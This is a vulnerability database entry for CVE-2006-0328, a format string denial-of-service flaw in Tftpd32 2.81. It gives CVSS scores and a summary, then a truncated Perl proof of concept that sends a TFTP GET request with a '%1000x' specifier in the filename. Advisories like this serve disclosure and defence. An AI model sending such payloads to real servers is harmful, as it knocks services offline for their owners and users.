5
CVSSv2

CVE-2006-0328

Published: 21/01/2006 Updated: 19/10/2018
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

Format string vulnerability in Tftpd32 2.81 allows remote malicious users to cause a denial of service via format string specifiers in a filename in a (1) GET or (2) SEND request.

Vulnerable Product Search on Vulmon Subscribe to Product

philippe jounin tftpd32 2.81

Exploits

#!/usr/bin/perl # Tftpd32 Format String PoC DoS by Critical Security research wwwcriticallt use IO::Socket; $port = "69"; $host = "127001"; $tftpudp = IO::Socket::INET->new(PeerPort => $port,PeerAddr => $host,Proto=> 'udp'); $bzz = "\x00\x01" ; #GET $bzz = "%1000x\x00"; $bzz = "\x6F\x63\x74\x65\x74\x00"; #octet $tftpudp ...